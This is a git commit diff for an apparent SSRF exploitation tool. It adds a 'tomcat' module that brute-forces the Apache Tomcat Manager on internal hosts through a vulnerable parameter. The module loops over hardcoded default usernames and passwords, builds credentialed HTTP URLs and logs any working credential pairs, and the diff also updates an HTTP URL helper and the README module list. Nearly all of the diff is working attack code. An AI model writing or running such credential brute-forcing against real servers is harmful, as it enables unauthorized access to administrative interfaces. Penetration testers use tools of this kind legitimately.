MODULE - Tomcat module - bruteforce attack against manager
parent
ec40fe1f91
commit
e8751bb51e
|
@ -69,6 +69,7 @@ The following modules are already implemented and can be used with the `-m` argu
|
||||||
| `digitalocean` | Read files from the provider (e.g: meta-data, user-data) |
|
| `digitalocean` | Read files from the provider (e.g: meta-data, user-data) |
|
||||||
| `socksproxy` | SOCKS4 Proxy |
|
| `socksproxy` | SOCKS4 Proxy |
|
||||||
| `smbhash` | Force an SMB authentication via a UNC Path |
|
| `smbhash` | Force an SMB authentication via a UNC Path |
|
||||||
|
| `tomcat` | Bruteforce attack against Tomcat Manager |
|
||||||
|
|
||||||
## Contribute
|
## Contribute
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,9 @@ def wrapper_gopher(data, ip, port):
|
||||||
def wrapper_dict(data, ip, port):
|
def wrapper_dict(data, ip, port):
|
||||||
return "dict://{}:{}/{}".format(ip, port, data)
|
return "dict://{}:{}/{}".format(ip, port, data)
|
||||||
|
|
||||||
def wrapper_http(data, ip, port):
|
def wrapper_http(data, ip, port, usernm=False, passwd=False):
|
||||||
|
if usernm != False and passwd != False:
|
||||||
|
return "http://{}:{}@{}:{}/{}".format(usernm, passwd, ip, port, data)
|
||||||
return "http://{}:{}/{}".format(ip, port, data)
|
return "http://{}:{}/{}".format(ip, port, data)
|
||||||
|
|
||||||
def wrapper_https(data, ip, port):
|
def wrapper_https(data, ip, port):
|
||||||
|
|
|
@ -0,0 +1,31 @@
|
||||||
|
from core.utils import *
|
||||||
|
import logging
|
||||||
|
|
||||||
|
name = "tomcat"
|
||||||
|
description = "Tomcat - Bruteforce manager"
|
||||||
|
author = "Swissky"
|
||||||
|
documentation = [
|
||||||
|
"https://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html",
|
||||||
|
"https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown"
|
||||||
|
]
|
||||||
|
|
||||||
|
class exploit():
|
||||||
|
SERVER_HOST = "127.0.0.1"
|
||||||
|
SERVER_PORT = "8888"
|
||||||
|
SERVER_TOMCAT = "manager/html"
|
||||||
|
tomcat_user = ["tomcat", "admin", "both", "manager", "role1", "role", "root"]
|
||||||
|
tomcat_pass = ["password", "tomcat", "admin", "manager", "role1", "changethis", "changeme", "r00t", "root", "s3cret","Password1", "password1"]
|
||||||
|
|
||||||
|
def __init__(self, requester, args):
|
||||||
|
logging.info("Module '{}' launched !".format(name))
|
||||||
|
|
||||||
|
# Using a generator to create the host list
|
||||||
|
gen_host = gen_ip_list(self.SERVER_HOST, args.level)
|
||||||
|
for ip in gen_host:
|
||||||
|
for usr in self.tomcat_user:
|
||||||
|
for pss in self.tomcat_pass:
|
||||||
|
payload = wrapper_http(self.SERVER_TOMCAT, ip, self.SERVER_PORT, usernm=usr, passwd=pss)
|
||||||
|
r = requester.do_request(args.param, payload)
|
||||||
|
|
||||||
|
if not "s3cret" in r.text:
|
||||||
|
logging.info("Found credential \033[32m{}\033[0m:\033[32m{}\033[0m".format(usr, pss))
|
Binary file not shown.
After Width: | Height: | Size: 21 KiB |
Loading…
Reference in New Issue